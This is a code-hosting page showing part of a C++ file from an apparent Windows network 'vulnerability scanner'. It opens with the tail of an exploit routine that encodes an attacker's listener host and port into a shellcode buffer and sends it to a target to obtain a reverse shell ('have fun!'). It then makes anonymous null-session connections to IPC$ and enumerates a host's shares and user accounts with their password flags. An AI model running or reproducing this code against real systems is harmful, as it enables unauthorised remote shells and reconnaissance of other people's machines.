⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 网络评估view.cpp

📁 支持常见网络漏洞的扫描.有CVS的漏洞数据库,界面友好,使用方便.
💻 CPP
📖 第 1 页 / 共 5 页
字号:
🔍
12345 
        }

		if ((ht = gethostbyname(argv[1])) == 0){
			#ifndef WIN32
			herror(argv[1]);
			#else
			 pView->AddString( "Unable to resolve host ");
			#endif
            return 0;
        }
        
        sin.sin_port = htons(atoi(argv[2]));
        a_port = htons(atoi(argv[4]));
        a_port^=0x9595;

        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);
        
        if ((ht = gethostbyname(argv[3])) == 0){
			#ifndef WIN32
            herror(argv[3]);
			#else
			 pView->AddString("Unable to resolve host ");
			#endif
            return 0;
        }
        
        a_host = *((unsigned long *)ht->h_addr);
        a_host^=0x95959595;

        sploit[441]= (a_port) & 0xff;
        sploit[442]= (a_port >> 8) & 0xff;

        sploit[446]=(char) ((a_host) & 0xff);
        sploit[447]= (char)((a_host >> 8) & 0xff);
        sploit[448]= (char)((a_host >> 16) & 0xff);
        sploit[449]=(char) ((a_host >> 24) & 0xff);

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                 pView->AddString("socket");
                return 0;
        }
        
        if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
                pView->AddString("connect");
                return 0;
        }
		else
			 pView->AddString("Connected.");
        
		if(send(s,sploit,strlen(sploit),0) == -1) {
			 pView->AddString("Error Sending Exploit.");
			return(-1);
		}
		else
	     	 pView->AddString("sent... you may need to send a carriage on your listener if the shell doesn't appear.have fun!");
       

        ::Sleep (1);
        closesocket(s);       
		return 1;
}       
BOOL EstablishNullSession(LPCWSTR Server,BOOL bEstablish)
{
    LPCWSTR szIpc = L"\\IPC$";
    WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
    DWORD cchServer;
    NET_API_STATUS nas;
    //
    // do not allow NULL or empty server name
    //

    if(Server == NULL || *Server == L'\0') {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    cchServer = lstrlenW( Server );

    if(Server[0] != L'\\' && Server[1] != L'\\') {

        //
        // prepend slashes and NULL terminate
        //

        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    else {
        cchServer -= 2; // drop slashes from count

        RemoteResource[0] = L'\0';
    }

    if(cchServer > CNLEN) {
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
    if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

    //
    // disconnect or connect to the resource, based on bEstablish
    //

    if(bEstablish) {
        USE_INFO_2 ui2;

        ZeroMemory(&ui2, sizeof(ui2));

        ui2.ui2_local = NULL;
        ui2.ui2_remote = (LPTSTR) RemoteResource;
        ui2.ui2_asg_type = USE_IPC;
        ui2.ui2_password =(LPTSTR) L"";
		ui2.ui2_username =(LPTSTR) L""; 
		ui2.ui2_domainname = (LPTSTR) L"";

        HINSTANCE FLibHandle1=LoadLibrary("NETAPI32.DLL");
        NetUseAdd_dll=(LPFNDLLFUNC15)GetProcAddress(FLibHandle1, "NetUseAdd");
        
        if(NetUseAdd_dll!=NULL)
        {
    	nas = NetUseAdd_dll(NULL, 2, (LPBYTE)&ui2, NULL);
        FreeLibrary(FLibHandle1);
		}


       // nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
    }
    else {
        //nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);
        HINSTANCE FLibHandle2=LoadLibrary("NETAPI32.DLL");
        NetUseDel_dll=(LPFNDLLFUNC16)GetProcAddress(FLibHandle2, "NetUseDel");
        
        if(NetUseDel_dll!=NULL)
        {
    	nas = NetUseDel_dll(NULL, (LPTSTR) RemoteResource, 0);
        FreeLibrary(FLibHandle2);
		}



    }

    if( nas == NERR_Success ) return TRUE; // indicate success

    SetLastError( nas );

    return FALSE;

}
int diskenum(LPWSTR computername,LPVOID lParam){

    CMyView*pView=(CMyView*)lParam;
	HWND hwnd=pView->GetSafeHwnd();
    pView->AddString("列举netbios共享(尝试winnt/2000系统)...要等待一段时间...");
    ::SendMessage(hwnd,WM_REDRAW,0,0);
	UCHAR temp[300],temp1[300];

    PSHARE_INFO_502 BufPtr,p;
    NET_API_STATUS res;
    DWORD i;
    DWORD entriesread=0, resume_handle=0, totalentries=0;


    pView->AddString("NetBIOS Share Results----------------");
    ::SendMessage(hwnd,WM_REDRAW,0,0);
	if(computername == NULL)
		pView->AddString("解析。。。。Shares:    Local Path:    Uses:     Descriptor: ");
    ::SendMessage(hwnd,WM_REDRAW,0,0);
	HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
    NetShareEnum_dll=(LPFNDLLFUNC4)GetProcAddress(FLibHandle, "NetShareEnum");
    if (NetShareEnum_dll!=NULL) 
    {
      res = NetShareEnum_dll((LPWSTR)computername,
							 502, 
							 (LPBYTE *) &BufPtr,
							 0xFFFFFFFF,
							 &entriesread,
							 &totalentries,
							 &resume_handle);

	  FreeLibrary(FLibHandle);
      }

	

	if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA)
	{
		pView->AddString("Shares:     Local Path:      Uses:     Descriptor:");
		::SendMessage(hwnd,WM_REDRAW,0,0);
        HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
        NetApiBufferFree_dll=(LPFNDLLFUNC5)GetProcAddress(FLibHandle, "NetApiBufferFree");
        if (NetApiBufferFree_dll!=NULL) 
		{
          
          NetApiBufferFree_dll(BufPtr);               
     	  FreeLibrary(FLibHandle);
		} 
	}
	
    
	do{
	   HINSTANCE FLibHandle1=LoadLibrary("NETAPI32.DLL");
           NetShareEnum_dll=(LPFNDLLFUNC4)GetProcAddress(FLibHandle1, "NetShareEnum");
		if (NetShareEnum_dll!=NULL) 
		{
          res = NetShareEnum_dll((LPWSTR)computername,
							 502, 
							 (LPBYTE *) &BufPtr,
							 0xFFFFFFFF,
							 &entriesread,
							 &totalentries,
							 &resume_handle);
  
	      FreeLibrary(FLibHandle1);
		}
		

		if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA){
			p=BufPtr;

			for(i=1;i<=entriesread;i++){
				
                sprintf((LPTSTR)temp,"Shares:%S\\%S Local Path:%S Uses:%S Descriptor:%u",computername,p->shi502_netname,p->shi502_netname, p->shi502_path, p->shi502_current_uses);
				pView->AddString(temp);
				sprintf((LPTSTR)temp1,"Shares:%S\\%S      Local Path:%S      Uses:%S      Descriptor:%u",computername,p->shi502_netname,p->shi502_netname, p->shi502_path, p->shi502_current_uses);
                pView->m_stringShares.AddTail(temp1);
				::SendMessage(hwnd,WM_REDRAW,0,0);
				if (IsValidSecurityDescriptor(p->shi502_security_descriptor))
					pView->AddString("p->shi502_security_descriptor=YES");
				else
					pView->AddString("p->shi502_security_descriptor=NO");
				::SendMessage(hwnd,WM_REDRAW,0,0);
				p++;
			}
			HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
            NetApiBufferFree_dll=(LPFNDLLFUNC5)GetProcAddress(FLibHandle, "NetApiBufferFree");
            if (NetApiBufferFree_dll!=NULL) 
			{
              NetApiBufferFree_dll(BufPtr);               
         	  FreeLibrary(FLibHandle);
			} 
			
			return(0);
		}
		else {
			sprintf((LPTSTR)temp,"Share Enumeration Error (%d)" ,GetLastError());//, ErrorHandle(pParam).begin());
			pView->AddString(temp);
			::SendMessage(hwnd,WM_REDRAW,0,0);
			return(3);      // Return 3 on error so we can run diskenum95()
		}
	}while (res==ERROR_MORE_DATA);
	return(0);
}

int diskenum_95(LPWSTR computername,LPVOID lParam){

    CMyView*pView=(CMyView*)lParam;
	HWND hwnd=pView->GetSafeHwnd();
    pView->AddString("列举netbios共享(尝试win95/98)...要等待一段时间...");
    ::SendMessage(hwnd,WM_REDRAW,0,0);
	UCHAR temp[300],temp1[300];
	
	PSHARE_INFO_1 BufPtr,p;
	NET_API_STATUS res;
	DWORD i = 0;
	DWORD entriesread=0, resume_handle=0, totalentries=0;
	if(computername == NULL)
		pView->AddString("解析。。。。Shares:      Type:     Comment:");
	::SendMessage(hwnd,WM_REDRAW,0,0);
	do{
	   HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
           NetShareEnum_dll=(LPFNDLLFUNC4)GetProcAddress(FLibHandle, "NetShareEnum");
		if (NetShareEnum_dll!=NULL) 
		{
         res = NetShareEnum_dll((LPWSTR)computername,
							 1,
							 (LPBYTE *) &BufPtr,
							 0xFFFFFFFF,
							 &entriesread,
							 &totalentries,
							 &resume_handle);


	     FreeLibrary(FLibHandle);
		}	
		if(res == ERROR_SUCCESS || res == ERROR_MORE_DATA){
			p = BufPtr;
			for(i=0;i<entriesread;i++){
				 sprintf((LPTSTR)temp,"Shares:%S\\%S netname:%S Type:%u Comment:%S",computername, p->shi1_netname, p->shi1_netname, p->shi1_type, p->shi1_remark);
				 pView->AddString(temp);
                 sprintf((LPTSTR)temp1,"Shares:%S\\%S      netname:%S     Type:%u      Comment:%S",computername, p->shi1_netname, p->shi1_netname, p->shi1_type, p->shi1_remark);
		         pView->m_stringShares.AddTail(temp1);
				 ::SendMessage(hwnd,WM_REDRAW,0,0);
				p++;
			}
			HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
            NetApiBufferFree_dll1=(LPFNDLLFUNC6)GetProcAddress(FLibHandle, "NetApiBufferFree");
            if (NetApiBufferFree_dll1!=NULL) 
			{
             NetApiBufferFree_dll1(BufPtr);               
         	  FreeLibrary(FLibHandle);
			} 
		}
		else{
			sprintf((LPTSTR)temp,"Share Enumeration Error (%d)" ,GetLastError());//, ErrorHandle(pParam).begin());
			pView->AddString(temp);
            ::SendMessage(hwnd,WM_REDRAW,0,0);
			//printf("Attempting to obtain NetBIOS shares using lower security setting\n");
			return(-1);
		}
	}while (res==ERROR_MORE_DATA);
	return(0);
}
int queryuser(LPWSTR szServer,LPVOID lParam){
    CMyView*pView=(CMyView*)lParam;
	HWND hwnd=pView->GetSafeHwnd();
    pView->AddString("列举用户名...要等待一段时间...");
    ::SendMessage(hwnd,WM_REDRAW,0,0);
	UCHAR temp[300];
	UCHAR temp1[256];
	PNET_DISPLAY_USER pBuff, p;
	DWORD res, dwRec, i = 0;  
	do{
	HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
        NetQueryDisplayInformation_dll=(LPFNDLLFUNC3)GetProcAddress(FLibHandle, "NetQueryDisplayInformation");
   
		  if (NetQueryDisplayInformation_dll!=NULL) 
		  {
           res = NetQueryDisplayInformation_dll(szServer, 1, i, 10000, 10000*sizeof(NET_DISPLAY_USER), &dwRec, (PVOID *)&pBuff);
      
	       FreeLibrary(FLibHandle);
		  }
		if((res==ERROR_SUCCESS) || (res==ERROR_MORE_DATA)){
			p = pBuff;
			 
			
			pView->AddString("User Query Results------------------------------");
			//(dlglocal->m_HistoryEdit).AppendString("Name:    Comment:    Full Name:   User ID:");
             ::SendMessage(hwnd,WM_REDRAW,0,0);
			for(;dwRec>0;dwRec--){
				sprintf((LPTSTR)temp,"Name:%S Comment:%S Full Name:%S User ID:%u",
					p->usri1_name,
					p->usri1_comment,
					p->usri1_full_name,
					p->usri1_user_id);
				sprintf((LPTSTR)temp1,"%S",p->usri1_name);
                pView->m_stringUsers.AddTail(temp1);

				pView->AddString(temp);
				::SendMessage(hwnd,WM_REDRAW,0,0);
				if (p->usri1_flags & UF_SCRIPT)
				pView->AddString("The logon script executed. This value must be set for LAN Manager 2.0 or Windows NT.");
				if (p->usri1_flags & UF_ACCOUNTDISABLE)
				pView->AddString("The user's account is disabled.");
				if (p->usri1_flags & UF_HOMEDIR_REQUIRED)
				pView->AddString("The home directory is required. Windows NT ignores this value.");
				if (p->usri1_flags & UF_PASSWD_NOTREQD)
				pView->AddString(" No password is required");
				if (p->usri1_flags & UF_PASSWD_CANT_CHANGE )
				pView->AddString("The user cannot change the password.");
				if (p->usri1_flags & UF_LOCKOUT)
				pView->AddString("The Account is Locked");
				if (p->usri1_flags & UF_DONT_EXPIRE_PASSWD)
				pView->AddString("Password does not expire");
                ::SendMessage(hwnd,WM_REDRAW,0,0);
				i = p->usri1_next_index;  //if there is more then set the index
				p++;
			}
			
			
            HINSTANCE FLibHandle=LoadLibrary("NETAPI32.DLL");
            NetApiBufferFree_dll2=(LPFNDLLFUNC7)GetProcAddress(FLibHandle, "NetApiBufferFree");
            if (NetApiBufferFree_dll2!=NULL) 
			{
          
             NetApiBufferFree_dll2(pBuff);               
     	     FreeLibrary(FLibHandle);
			} 

			return(0);
		}
		else{
			sprintf((LPTSTR)temp, "User Enumeration Error:(%u)  " ,res);//, ErrorHandle(pParam).begin());
			pView->AddString(temp);
			::SendMessage(hwnd,WM_REDRAW,0,0);
			return(-1);
		}
	}while (res==ERROR_MORE_DATA);
}
12345

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -